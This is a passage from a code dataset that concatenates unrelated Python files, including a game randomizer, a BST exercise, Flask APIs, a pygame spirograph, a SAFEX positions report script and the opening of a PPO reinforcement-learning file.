inner_cave_dzr.entries_by_type(SCLS)[0]\n inner_cave_exit_scls.dest_stage_name = zone_entrance.stage_name\n inner_cave_exit_scls.room_index = zone_entrance.room_num\n inner_cave_exit_scls.spawn_id = zone_entrance.spawn_id\n inner_cave_exit_scls.save_changes()\n \n # Also update the sector coordinates in the 2DMA chunk of the inner cave of Ice Ring Isle so save-and-quitting works properly there.\n inner_cave_dzs_path = \"files/res/Stage/ITest62/Stage.arc\"\n inner_cave_dzs = self.get_arc(inner_cave_dzs_path).get_file(\"stage.dzs\", DZx)\n inner_cave_2dma = inner_cave_dzs.entries_by_type(_2DMA)[0]\n inner_cave_2dma.sector_x = sector_x-3\n inner_cave_2dma.sector_y = sector_y-3\n inner_cave_2dma.save_changes()\n\ndef update_boss_warp_out_destination(self, boss_stage_name, outermost_entrance):\n # Update the wind warp out event to take you to the correct island.\n boss_stage_arc_path = \"files/res/Stage/%s/Stage.arc\" % boss_stage_name\n event_list = self.get_arc(boss_stage_arc_path).get_file(\"event_list.dat\", EventList)\n warp_out_event = event_list.events_by_name[\"WARP_WIND_AFTER\"]\n director = next(actor for actor in warp_out_event.actors if actor.name == \"DIRECTOR\")\n stage_change_action = next(action for action in director.actions if action.name == \"NEXT\")\n stage_name_prop = next(prop for prop in stage_change_action.properties if prop.name == \"Stage\")\n stage_name_prop.value = outermost_entrance.warp_out_stage_name\n room_num_prop = next(prop for prop in stage_change_action.properties if prop.name == \"RoomNo\")\n room_num_prop.value = outermost_entrance.warp_out_room_num\n spawn_id_prop = next(prop for prop in stage_change_action.properties if prop.name == \"StartCode\")\n spawn_id_prop.value = outermost_entrance.warp_out_spawn_id\n\ndef get_entrance_zone_for_item_location(self, location_name):\n # Helper function to return the entrance zone name for the location.\n #\n # For non-dungeon and non-cave locations, the entrance zone name is simply the zone (island) name. However, when\n # entrances are randomized, the entrance zone name may differ from the zone name for dungeons and caves.\n # As a special case, if the entrance zone is Tower of the Gods or the location name is \"Tower of the Gods - Sunken\n # Treasure\", the entrance zone name is \"Tower of the Gods Sector\" to differentiate between the dungeon and the\n # entrance.\n \n zone_name, specific_location_name = self.logic.split_location_name_by_zone(location_name)\n \n if location_name in ITEM_LOCATION_NAME_TO_EXIT_ZONE_NAME_OVERRIDES:\n zone_name = ITEM_LOCATION_NAME_TO_EXIT_ZONE_NAME_OVERRIDES[location_name]\n \n if zone_name in self.dungeon_and_cave_island_locations and self.logic.is_dungeon_or_cave(location_name):\n # If the location is in a dungeon or cave, use the hint for whatever island the dungeon/cave is located on.\n entrance_zone = self.dungeon_and_cave_island_locations[zone_name]\n \n # Special case for Tower of the Gods to use Tower of the Gods Sector when refering to the entrance, not the dungeon\n if entrance_zone == \"Tower of the Gods\":\n entrance_zone = \"Tower of the Gods Sector\"\n else:\n # Otherwise, for non-dungeon and non-cave locations, just use the zone name.\n entrance_zone = zone_name\n \n # Special case for Tower of the Gods to use Tower of the Gods Sector when refering to the Sunken Treasure\n if location_name == \"Tower of the Gods - Sunken Treasure\":\n entrance_zone = \"Tower of the Gods Sector\"\n # Note that Forsaken Fortress - Sunken Treasure has a similar issue, but there are no randomized entrances on\n # Forsaken Fortress, so we won't make that distinction here.\n \n return entrance_zone\n","sub_path":"randomizers/entrances.py","file_name":"entrances.py","file_ext":"py","file_size_in_byte":30244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"369513582","text":"# bst_2.py is the traditional way of implementing a BST.\r\n # The put() (and _put()) operation does NOT return a node going back up the call stack. \r\n # It just keeps calling until it finds the node where node.key == key or where the node is None.\r\n # When the _put() method is called for a given node, we know ahead of time that that node is NOT None.\r\n # This makes determining the size of each node (which is necessary for select() and rank() operations) much less efficient (would have to use lazy method).\r\n # Before using the select and rank operations, you could perform a size operation that takes linear time by going through each node and updating the size of each node.\r\n # Could use some sort of caching if the bst.node_count == self.root.size, you don't have to perform the size operation\r\n # Even with caching, this could result in a really inefficent method if rank() and select() are called frequently and/or interspersed with put() and delete() operations! \r\n # When the _get() method is called for a given node, we know ahead of time that the node is NOT None.\r\n\r\n# bst_3.py is the way Sedgewick implements a BST.\r\n # The put() (and _put()) operation returns a node going back up the call stack.\r\n # This allows us to easily modify the size parameter of each node going back up the call stack (the eager method takes time proportional to the length of the path).\r\n # When the _put() method is called for a given node, we do NOT know ahead of time if the node is None.\r\n # When the _get() method is called for a given node, we do NOT know ahead of time that the node is not None.\r\n # This method has more carry-over to more complicated BST structures like the red-black tree. \r\n\r\n# python bst_2.py\r\n\r\nclass Node:\r\n def __init__(self, key, value):\r\n self.key = key\r\n self.value = value\r\n self.size = 1\r\n self.left = None\r\n self.right = None\r\n\r\nclass BST:\r\n def __init__(self):\r\n self.root = None\r\n self.nodes = 0\r\n \r\n def put(self, key, value):\r\n if self.root == None:\r\n self.root = Node(key, value)\r\n return\r\n else:\r\n self._put(self.root, key, value)\r\n \r\n \r\n def _put(self, node, key, value):\r\n if key==node.key:\r\n node.value = value\r\n return\r\n elif key < node.key:\r\n if node.left == None:\r\n node.left = Node(key, value)\r\n return\r\n else:\r\n self._put(node.left, key, value)\r\n elif key > node.key:\r\n if node.right == None:\r\n node.right = Node(key, value)\r\n return\r\n else:\r\n self._put(node.right, key, value)\r\n \r\n def get(self, key):\r\n if self.root == None:\r\n return None\r\n else:\r\n return self._get(self.root, key)\r\n \r\n def _get(self, node, key):\r\n \r\n if key==node.key:\r\n return node.value\r\n elif key < node.key:\r\n if node.left == None:\r\n return None\r\n else:\r\n return self._get(node.left, key)\r\n elif key > node.key:\r\n if node.right == None:\r\n return None\r\n else:\r\n return self._get(node.right, key) \r\n \r\ndef main():\r\n bst = BST()\r\n bst.put('Jim', 22)\r\n bst.put('Frank', 54)\r\n bst.put('Billy', 36)\r\n bst.put('Hank', 87)\r\n bst.put('Tom', 18)\r\n bst.put('Xavier', 44)\r\n bst.put('Ernie', 112)\r\n bst.put('Sam', 47)\r\n \r\n print(bst.get('Hank'))\r\n \r\n \r\nif __name__==\"__main__\": main()\r\n \r\n \r\n \r\n ","sub_path":"chapter_3/st_binarysearchtree/bst_2.py","file_name":"bst_2.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"146282814","text":"from flask import Blueprint, render_template, session\nimport json\nfrom general import TopArtists\nfrom database import db\nimport tagme\n\n\nclass Event(db.Model):\n __tablename__ = 'event'\n id = db.Column(db.INTEGER, primary_key=True, autoincrement=True)\n name = db.Column(db.VARCHAR)\n info = db.Column(db.VARCHAR)\n url = db.Column(db.VARCHAR)\n eventWiki = db.relationship('EventWiki', cascade='all')\n\n def __repr__(self):\n return '' % self.id\n\n\nclass EventWiki(db.Model):\n __tablename = 'event_wiki'\n event_id = db.Column(db.INTEGER, db.ForeignKey('event.id'), primary_key=True)\n wiki_id = db.Column(db.INTEGER, db.ForeignKey('wiki_content.id'), primary_key=True)\n wikiContent = db.relationship('WikiContent', cascade='save-update, merge')\n\n def __repr__(self):\n return '' % (self.event_id, self.wiki_id)\n\n\nclass WikiContent(db.Model):\n __tablename = 'wiki_content'\n id = db.Column(db.INTEGER, primary_key=True)\n title = db.Column(db.VARCHAR)\n\n def __repr__(self):\n return '' % self.id\n\n\nclass UserTopArtistWikiRecord(db.Model):\n __tablename = 'user_top_artist_wiki_record'\n user_id = db.Column(db.VARCHAR, db.ForeignKey('user.id'), primary_key=True)\n annote_wid = db.Column(db.VARCHAR)\n annote_title = db.Column(db.VARCHAR)\n\n\nspotify_tagme_bp = Blueprint('spotify_tagme_bp', __name__)\n\nkeys_tagme = {\"token\": \"\"}\n\ntry:\n keys_tagme = json.load(open('keys_tagme.json', 'r'))\nexcept Exception as e:\n print(e)\n\ntagme.GCUBE_TOKEN = str(keys_tagme[\"token\"])\n\n\n@spotify_tagme_bp.route('/annotate_event')\ndef annotate_event():\n events = db.session.query(Event).all()\n\n for event in events:\n dict_ann = tagme_annotation(event.info)\n\n try:\n for ann in dict_ann:\n wiki_content_obj = WikiContent.query.filter_by(id=ann).first()\n if wiki_content_obj:\n event_wiki_obj = EventWiki(event_id=event.id, wiki_id=ann, wikiContent=wiki_content_obj)\n db.session.add(event_wiki_obj)\n else:\n wiki_content = WikiContent(id=int(ann), title=dict_ann[ann])\n event_wiki_obj = EventWiki(event_id=event.id, wiki_id=int(ann), wikiContent=wiki_content)\n db.session.add(event_wiki_obj)\n db.session.commit()\n except Exception as e:\n print(e)\n\n return render_template('test.html')\n\n\n@spotify_tagme_bp.route('/annotate_user_top_artist')\ndef annotate_user_top_artist():\n user_id = session[\"userid\"]\n\n user_top_artist_wiki_record = UserTopArtistWikiRecord.query.filter_by(user_id=user_id).first()\n\n if not user_top_artist_wiki_record:\n top_artists = db.session.query(TopArtists).filter_by(user_id=user_id).group_by(TopArtists.artist_id).all()\n\n l_artist = []\n\n for artist in top_artists:\n l_artist.append(artist.artist.name)\n\n str_artist = \", \".join(l_artist)\n\n try:\n dict_ann = tagme_annotation(str_artist)\n\n if len(dict_ann) != 0:\n user_top_artist_wiki_record = UserTopArtistWikiRecord(user_id=user_id,\n annote_wid=\";\".join(list(dict_ann)),\n annote_title=\";\".join(list(dict_ann.values())))\n db.session.add(user_top_artist_wiki_record)\n db.session.commit()\n\n except Exception as e:\n print(e)\n\n return render_template(\"test.html\")\n\n\ndef tagme_rel(wid_pairs):\n rels = tagme.relatedness_title(wid_pairs)\n\n return rels.relatedness\n\n\ndef tagme_annotation(text_to_annotate):\n event = tagme.annotate(text_to_annotate)\n\n dict_ann = {}\n\n # Print annotations with a score higher than 0.3\n for ann in event.get_annotations(0.3):\n dict_ann[str(ann.entity_id)] = ann.entity_title\n\n return dict_ann\n\n","sub_path":"text_analyze/spotify_tagme.py","file_name":"spotify_tagme.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"61913148","text":"#Autor: Daniel Cordova Bermudez\n#Grupo 02\n#Descripción: Con una serie de funciones se crea figuaras geometricas.\n\nimport pygame # Librería de pygame\nimport math #Librería de matematicas de python\n\n# Dimensiones de la pantalla\nANCHO = 800\nALTO = 800\n# Colores\nBLANCO = (255, 255, 255) # R,G,B en el rango [0,255], 0 ausencia de color, 255 toda la intensidad\n\n\n#Crea colores aleatorios.\ndef color():\n return random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)\n\n\n#Dibuja la primera figura.\ndef figura1(ventana):\n\n\n l = 2\n radioMenor = 50\n radioMayor = 140\n k = radioMenor / radioMayor\n r = radioMenor // math.gcd(radioMenor, radioMayor)\n\n for angulo in range(0, 360 * r + 1):\n a = math.radians(angulo)\n x = int(radioMayor * ((1 - k) * math.cos(a) + l * k * math.cos((1 - k) * a / k)))\n y = int(radioMayor * ((1 - k) * math.sin(a) - l * k * math.sin((1 - k) * a / k)))\n pygame.draw.circle(ventana, color(), (x + ANCHO // 2, ALTO // 2 - y), 1)\n\n\n#Dibuja la segunda figura.\ndef figura2(ventana):\n\n\n l = .8\n radioMenor = 70\n radioMayor = 300\n k = radioMenor / radioMayor\n r = radioMenor // math.gcd(radioMenor, radioMayor)\n\n for angulo in range(0, 360 * r + 1):\n a = math.radians(angulo)\n x = int(radioMayor * ((1 - k) * math.cos(a) + l * k * math.cos((1 - k) * a / k)))\n y = int(radioMayor * ((1 - k) * math.sin(a) - l * k * math.sin((1 - k) * a / k)))\n pygame.draw.circle(ventana, color(), (x + ANCHO // 2, ALTO // 2 - y), 1)\n\n\n#Dibuja la tercerafigura.\ndef figura3(ventana):\n\n l = .6\n radioMenor = 5\n radioMayor = 150\n k = radioMenor / radioMayor\n r = radioMenor // math.gcd(radioMenor, radioMayor)\n\n for angulo in range(0, 360 * r + 1):\n a = math.radians(angulo)\n x = int(radioMayor * ((1 - k) * math.cos(a) + l * k * math.cos((1 - k) * a / k)))\n y = int(radioMayor * ((1 - k) * math.sin(a) - l * k * math.sin((1 - k) * a / k)))\n pygame.draw.circle(ventana, color(), (x + ANCHO // 2, ALTO // 2 - y), 1)\n\n\n#Dibuja la cuarta figura.\ndef figura4(ventana):\n\n l = .6\n radioMenor = 70\n radioMayor = 400\n k = radioMenor / radioMayor\n r = radioMenor // math.gcd(radioMenor, radioMayor)\n\n for angulo in range(0, 360 * r + 1):\n a = math.radians(angulo)\n x = int(radioMayor * ((1 - k) * math.cos(a) + l * k * math.cos((1 - k) * a / k)))\n y = int(radioMayor * ((1 - k) * math.sin(a) - l * k * math.sin((1 - k) * a / k)))\n pygame.draw.circle(ventana,color(), (x + ANCHO // 2, ALTO // 2 - y), 1)\n\n#Dibuja la quinta figura.\ndef figura5(ventana):\n\n l = 7\n radioMenor = 40\n radioMayor = 100\n k = radioMenor / radioMayor\n r = radioMenor // math.gcd(radioMenor, radioMayor)\n\n for angulo in range(0, 360 * r + 1):\n a = math.radians(angulo)\n x = int(radioMayor * ((1 - k) * math.cos(a) + l * k * math.cos((1 - k) * a / k)))\n y = int(radioMayor * ((1 - k) * math.sin(a) - l * k * math.sin((1 - k) * a / k)))\n pygame.draw.circle(ventana, color(), (x + ANCHO // 2, ALTO // 2 - y), 1)\n\n\n#Inicia Pygame, llama a las funciones de para dibujar las figuras.\ndef dibujarEspirografo():\n\n # Estructura básica de un programa que usa pygame para dibujar\n # Inicializa el motor de pygame\n pygame.init()\n # Crea una ventana de ANCHO x ALTO\n ventana = pygame.display.set_mode((ANCHO, ALTO)) # Crea la ventana donde dibujará\n reloj = pygame.time.Clock() # Para limitar los fps\n termina = False # Bandera para saber si termina la ejecución, iniciamos suponiendo que no\n\n while not termina: # Ciclo principal, MIENTRAS la variable termina sea False, el ciclo se repite automáticamente\n # Procesa los eventos que recibe\n for evento in pygame.event.get():\n if evento.type == pygame.QUIT: # El usuario hizo click en el botón de salir\n termina = True # Queremos terminar el ciclo\n\n # Borrar pantalla\n ventana.fill(BLANCO)\n\n # Dibujar, aquí haces todos los trazos que requieras\n # Normalmente llamas a otra función y le pasas -ventana- como parámetro, por ejemplo, dibujarLineas(ventana)\n # Consulta https://www.pygame.org/docs/ref/draw.html para ver lo que puede hacer draw\n\n figura1(ventana)\n figura2(ventana)\n figura3(ventana)\n figura4(ventana)\n figura5(ventana)\n\n pygame.display.flip() # Actualiza trazos (Si no llamas a esta función, no se dibuja)\n reloj.tick(40) # 40 fps\n\n # Después del ciclo principal\n pygame.quit() # termina pygame\n\n\n#Funcion main llama a la funcion que inicia pygam y dibuja las figuras.\ndef main():\n dibujarEspirografo()\n\n#LLama a la funcion main.\nmain()","sub_path":"Mision_6.py","file_name":"Mision_6.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"512296619","text":"\"\"\"\n-------------------------------------------------------------------------------\nMODULE\n safex_positions\n\nDESCRIPTION\n Date : 2014-04-07\n Purpose : This module contains an implementation of generating\n safex positions report.\n Department and Desk : Risk Mid\n Requester : Patrick Ngoie\n Developer : Jakub Tomaga\n CR Number : CHNG0001865852\n\nHISTORY\n===============================================================================\nDate CR number Developer Description\n-------------------------------------------------------------------------------\n24-04-2014 1919888 Jakub Tomaga Quote marks around non-numeric\n values removed, ClosingAIP column\n added back - both modifictaions\n in the previous version of the\n script caused failures during\n subsequent Intellimatch feed.\n-------------------------------------------------------------------------------\n\"\"\"\n\nimport acm\nfrom at_ael_variables import AelVariableHandler\nimport at_report\n\n\nclass PositionsReport(at_report.CSVReportCreator):\n \"\"\"Creates the report.\"\"\"\n def __init__(self, name, suffix, path, trade_filter, start_date, end_date):\n super(PositionsReport, self).__init__(file_name=name,\n file_suffix=suffix, path=path,\n csv_writer_parameters={'delimiter': ','}) # No quote marks!\n\n self.trade_filter = trade_filter\n self.start_date = start_date\n self.end_date = end_date\n\n def _collect_data(self):\n \"\"\"Collect all required data relevant for the report.\"\"\"\n self._log('Started')\n\n calc_space = acm.Calculations().CreateCalculationSpace(\n acm.GetDefaultContext(), 'FPortfolioSheet')\n\n trade_selection = acm.FTradeSelection[self.trade_filter]\n top_node = calc_space.InsertItem(trade_selection)\n\n grouper = acm.FStoredPortfolioGrouper.Select(\n 'name=Portfolio')[0].Grouper()\n top_node.ApplyGrouper(grouper)\n\n # Portfolio sheet settings (variables)\n pnl_start_date_var = 'Standard Calculations Profit And Loss Start Date'\n pnl_end_date_var = 'Standard Calculations Profit And Loss End Date'\n valuation_date_var = 'Valuation Date'\n\n calc_space.SimulateGlobalValue(pnl_start_date_var, self.start_date)\n calc_space.SimulateGlobalValue(pnl_end_date_var, self.end_date)\n calc_space.SimulateGlobalValue(valuation_date_var, self.end_date)\n\n calc_space.Refresh()\n\n # Extract data\n if top_node.NumberOfChildren():\n # Iterate over a node tree structure in the calculation sheet\n # Note: Iterators need to be cloned - otherwise deeper levels won't\n # be handled properly!\n portfolio_iter = top_node.Iterator().Clone().FirstChild()\n while portfolio_iter:\n count = 1\n number_of_children = portfolio_iter.Tree().NumberOfChildren()\n ins_iter = portfolio_iter.Clone().FirstChild()\n portfolio_name = portfolio_iter.Tree().Item().StringKey()\n while ins_iter:\n self._log('Processing {0}/{1} ({2})'.format(count,\n number_of_children, portfolio_name))\n count += 1\n self.content.append(self._line(calc_space, ins_iter,\n portfolio_name))\n ins_iter = ins_iter.NextSibling()\n portfolio_iter = portfolio_iter.NextSibling()\n\n # Remove simulations\n calc_space.RemoveGlobalSimulation(pnl_start_date_var)\n calc_space.RemoveGlobalSimulation(pnl_end_date_var)\n calc_space.RemoveGlobalSimulation(valuation_date_var)\n\n self._log('Finished')\n\n def _line(self, calc_space, iterator, portfolio_name):\n \"\"\"Return a line to be appended to the csv file.\n\n iterator.Item() should return object of FInstrumentAndTrades\n \"\"\"\n\n # Input values\n period_start = self.start_date\n period_end = self.end_date\n\n # Directly extracted values from data structures\n ins = iterator.Tree().Item().Instruments()[0]\n ins_name = ins.Name()\n currency = ins.Currency().Name()\n contract_size = ins.ContractSize()\n ins_type = ins.InsType()\n expiry = ins.ExpiryDate()\n quote_type = ins.QuoteType()\n quotation_factor = ins.Quotation().QuotationFactor()\n\n if ins.InsType() == 'Option':\n ins_option_type = 'Call' if ins.IsCallOption() else 'Put'\n ins_strike_price = ins.StrikePrice()\n else:\n # Not applicable when instrument's type is other than option.\n ins_option_type = ins_strike_price = ''\n\n # Directly extracted vales for underlying instrument (if any)\n u_ins = ins.Underlying()\n if u_ins:\n u_contract_size = u_ins.ContractSize()\n u_ins_name = u_ins.Name()\n u_ins_type = u_ins.InsType()\n\n # Normalised instrument name\n u_normalised_ins = self._normalised_instrument_name(u_ins)\n\n else:\n # Not applicable when underlying instrument doesn't exist\n u_contract_size = u_ins_name = u_ins_type = u_normalised_ins = ''\n\n # Values from calculation space\n value_start = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Value Start').FormattedValue())\n\n value_end = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Value End').FormattedValue())\n\n used_price_start = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Profit Loss Price Start Date').FormattedValue())\n\n used_price_end = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Profit Loss Price End Date').FormattedValue())\n\n pl_position_start = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Profit Loss Position Start').FormattedValue())\n\n pl_position_end = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Profit Loss Position End').FormattedValue())\n\n total_pl = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Total Profit and Loss').FormattedValue())\n\n total_pl_daily = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Total Profit and Loss Daily').FormattedValue())\n\n # Dependent values\n if ins_type == 'Future/Forward' and quote_type == 'Per Contract':\n normalised_used_price_start = (used_price_start *\n quotation_factor / contract_size)\n normalised_used_price_end = (used_price_end *\n quotation_factor / contract_size)\n else:\n normalised_used_price_start = pl_position_start * quotation_factor\n normalised_used_price_end = pl_position_end * quotation_factor\n\n if ins_option_type:\n opening_front_notional = (pl_position_start *\n normalised_used_price_start)\n closing_front_notional = (pl_position_end *\n normalised_used_price_end)\n else:\n opening_front_notional = (pl_position_start *\n normalised_used_price_start * contract_size)\n closing_front_notional = (pl_position_end *\n normalised_used_price_end * contract_size)\n \n portfolio_nbr = ''\n physical_port = acm.FPhysicalPortfolio[portfolio_name]\n if physical_port:\n portfolio_nbr = physical_port.Oid()\n\n # Once the report is generated, it is used for feed into Intellimatch\n # which depends on column positioning. That's why the column needs to\n # stay in it's original position. Default value 0 - no specification.\n closing_aip = 0\n\n # Construct output line out of extracted data\n line = (\n portfolio_name,\n portfolio_nbr,\n u_contract_size,\n ins_name,\n value_start,\n value_end,\n currency,\n pl_position_end,\n contract_size,\n period_start,\n period_end,\n total_pl,\n used_price_start,\n used_price_end,\n ins_type,\n u_ins_name,\n u_ins_type,\n ins_option_type,\n ins_strike_price,\n expiry,\n quote_type,\n closing_aip,\n total_pl_daily,\n pl_position_start,\n quotation_factor,\n u_normalised_ins,\n normalised_used_price_start,\n normalised_used_price_end,\n opening_front_notional,\n closing_front_notional\n )\n\n return line\n\n @staticmethod\n def _normalised_instrument_name(instrument):\n \"\"\"Return normalised instrument name.\"\"\"\n name = instrument.Name()\n\n if name.lower().startswith('zar/'):\n if instrument.InsType() in ('Commodity', 'Future/Forward'):\n name = name.split('/')[1]\n elif instrument.InsType() == 'EquityIndex':\n if name.lower().__contains__('_divfut_underlying'):\n name = name.split('/', 1)[1]\n else:\n name = name.split('/', 1)[1].split('_')[0]\n elif instrument.InsType() in ('Stock', 'ETF'):\n name = name.split('/', 1)[1].split('_')[0]\n\n return name\n\n @staticmethod\n def _str_to_float(val):\n \"\"\"\n Convert string to float while ignoring the commas\n within the number.\n \"\"\"\n if type(val) == float:\n return val\n else:\n try:\n return float(val.replace(',', '')) if val != '' else 0\n except ValueError:\n return 0\n\n def _header(self):\n \"\"\"Return columns of the header.\"\"\"\n header = [\n 'Portfolio',\n 'PortfolioID',\n 'Underlying.ContractSize',\n 'Instrument',\n 'Val Start',\n 'Val End',\n 'Currency',\n 'PLPosEnd',\n 'Contract Size',\n 'Period Start',\n 'Period End',\n 'TPL',\n 'Used Price Start',\n 'Used Price End',\n 'InstrumentType',\n 'UnderlyingInstrument',\n 'UnderlyingInstruentType',\n 'Call/Put',\n 'Strike Price',\n 'Expiry',\n 'QuoteType',\n 'ClosingAIP',\n 'TPLD',\n 'PLPosStart',\n 'QuotationFactor',\n 'NormalisedUnderlyingInstrument',\n 'NormalisedUsedPriceStart',\n 'NormalisedUsedPriceEnd',\n 'OpeningFrontNotional',\n 'ClosingFrontNotional'\n ]\n\n return header\n\n @staticmethod\n def _log(message):\n \"\"\"Basic console logging with time stamp prefix.\"\"\"\n print(\"{0}: {1}\".format(acm.Time.TimeNow(), message))\n\n\n_CALENDAR = acm.FCalendar['ZAR Johannesburg']\nTODAY = acm.Time().DateToday()\nPREVIOUS_BUSINESS_DAY = _CALENDAR.AdjustBankingDays(TODAY, -1)\n\nSTART_DATE_DICT = {\n 'Previous Business Day': PREVIOUS_BUSINESS_DAY,\n 'Custom Date': PREVIOUS_BUSINESS_DAY\n}\nSTART_DATE_KEYS = START_DATE_DICT.keys()\nSTART_DATE_KEYS.sort()\n\nEND_DATE_DICT = {\n 'Today': TODAY,\n 'Custom Date': TODAY\n}\nEND_DATE_KEYS = END_DATE_DICT.keys()\nEND_DATE_KEYS.sort()\n\n\ndef custom_start_date_hook(selected_variable):\n \"\"\"Enable/Disable Custom Start Date based on Start Date value.\"\"\"\n start_date_custom = selected_variable.handler.get('start_date_custom')\n\n if selected_variable.value == 'Custom Date':\n start_date_custom.enabled = True\n else:\n start_date_custom.enabled = False\n\n\ndef custom_end_date_hook(selected_variable):\n \"\"\"Enable/Disable Custom End Date based on End Date value.\"\"\"\n end_date_custom = selected_variable.handler.get('end_date_custom')\n\n if selected_variable.value == 'Custom Date':\n end_date_custom.enabled = True\n else:\n end_date_custom.enabled = False\n\n\nael_variables = AelVariableHandler()\nael_variables.add('trade_filter', label='Trade filter',\n default='SI_safex_futures', alt='Trade filter')\n\nael_variables.add('filename', label='Filename',\n default='FrontArena_Safex_Positions', alt='Filename')\n\nael_variables.add('path', label='Path', default=r'F:/', alt='Path')\n\nael_variables.add('start_date', label='Start Date',\n default='Previous Business Day', collection=START_DATE_KEYS,\n alt='Start date', hook=custom_start_date_hook)\n\nael_variables.add('start_date_custom', label='Start Date Custom',\n default=PREVIOUS_BUSINESS_DAY, alt='Custom start date', enabled=False)\n\nael_variables.add('end_date', label='End Date',\n default='Today', collection=END_DATE_KEYS,\n alt='End date', hook=custom_end_date_hook)\n\nael_variables.add('end_date_custom', label='End Date Custom',\n default=TODAY, alt='Custom end date', enabled=False)\n\n\ndef ael_main(config):\n \"\"\"The main entry point of the Run Script window.\"\"\"\n # Get start date\n if config['start_date'] == 'Custom Date':\n start_date = config['start_date_custom']\n else:\n start_date = START_DATE_DICT[config['start_date']]\n\n # Get end date\n if config['end_date'] == 'Custom Date':\n end_date = config['end_date_custom']\n else:\n end_date = END_DATE_DICT[config['end_date']]\n\n # Generate the report\n report = PositionsReport(name=config['filename'], suffix='csv',\n path=config['path'], trade_filter=config['trade_filter'],\n start_date=start_date, end_date=end_date)\n report.create_report()\n","sub_path":"Python modules/safex_positions.py","file_name":"safex_positions.py","file_ext":"py","file_size_in_byte":14168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"632924393","text":"\ndef make_edge_list(adjacency):\n \"\"\" this function create an edge list representation of a graph using the supplied adjacency matrix\n \"\"\"\n # Maybe start with an empty edge_list\n edge_list = []\n \n # Insert code here\n for row in adjacency:\n lst = []\n for i,item in enumerate(row):\n if item != 0:\n lst.append(chr(65+i))\n edge_list.append(lst) \n\n return edge_list","sub_path":"year2_1819/computer_programming_3_algorithms_data_structures/2019_01_26_16_02_32_255813_organised/w10_graph_algorithms/adjacency_matrix_to_an_edge_list.py","file_name":"adjacency_matrix_to_an_edge_list.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"176102163","text":"import joblib\nimport numpy as np\nfrom flask import Flask, request, jsonify\nimport pandas as pd\n\ndata = pd.read_csv(\"data/ks-projects-201801.csv\")\ncategory_options = data['main_category'].unique().tolist()\ncountry_options = data['country'].unique().tolist()\ncurrency_options = data['currency'].unique().tolist()\n\n# Carregando modelos e encoders dos atributos\nmodel = joblib.load('models/kickstarter_classifier.joblib')\nencoder = joblib.load('models/kickstarter_encoder.joblib')\ngoal_scaler = joblib.load('models/kickstarter_goal_scaler.joblib')\nbackers_scaler = joblib.load('models/kickstarter_backers_scaler.joblib')\nduration_scaler = joblib.load('models/kickstarter_duration_scaler.joblib')\n\napp = Flask(__name__)\n\n# Exemplo de request:\n# {\n# \"category\": \"Poetry\", \n# \"main_category\": \"Publishing\", \n# \"currency\": \"GBP\",\n# \"goal\": 1000.0,\n# \"country\": \"GB\",\n# \"duration_days\": 58,\n# \"backers\": 300\n# }\n@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n content = request.get_json()\n content['goal'] = goal_scaler.transform(np.ndarray(content['goal']).reshape(-1, 1))[0]\n content['backers'] = backers_scaler.transform(np.ndarray(content['backers']).reshape(-1, 1))[0]\n content['duration_days'] = duration_scaler.transform(np.ndarray(content['duration_days']).reshape(-1, 1))[0]\n encoded = encoder.transform([content])\n result = model.predict_proba(encoded)\n return jsonify({\n 'success': result[0][1],\n 'failed': result[0][0]\n })\n\n@app.route('/categories', methods=['GET'])\ndef getCategoryOptions():\n return jsonify(category_options)\n\n@app.route('/countries', methods=['GET'])\ndef getCountryOptions():\n return jsonify(country_options)\n\n@app.route('/currencies', methods=['GET'])\ndef getCurrencyOptions():\n return jsonify(currency_options)\n\nif __name__ == '__main__':\n app.run()","sub_path":"trabalho_final_inferencia.py","file_name":"trabalho_final_inferencia.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"455600056","text":"import numpy as np\nimport gym\nfrom tensorboardX import SummaryWriter\nimport threading\n\nimport time\nimport datetime\nfrom collections import namedtuple\nfrom collections import deque\nimport math\nimport os\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.nn.utils.clip_grad import clip_grad_norm_\n\n\n# https://github.com/andri27-ts/Reinforcement-Learning/blob/master/Week5/PPO.py\n\n\nclass ConvProcess(nn.Module):\n def __init__(self, input_shape, out_size, device):\n super(ConvProcess, self).__init__()\n\n self.conv = nn.Sequential(\n nn.Conv2d(3, 16, kernel_size=8, stride=4),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.Conv2d(16, 32, kernel_size=4, stride=2),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.Conv2d(32, 64, kernel_size=3, stride=1),\n nn.BatchNorm2d(64),\n nn.ReLU()\n )\n\n self.device = device\n\n def prep(self, state):\n state = torch.tensor(np.array([state])).float().to(self.device)\n state = state.permute(0, 3, 1, 2)\n return state\n\n def forward(self, state):\n state = self.prep(state)\n return torch.flatten(self.conv(state))\n\n def _get_conv_out(self, net, shape):\n o = net(torch.zeros(3, *shape)) # apply convolution layers..\n return int(np.prod(o.size())) # ..to obtain the output shape\n\n\nclass A2C_policy(nn.Module):\n '''\n policy 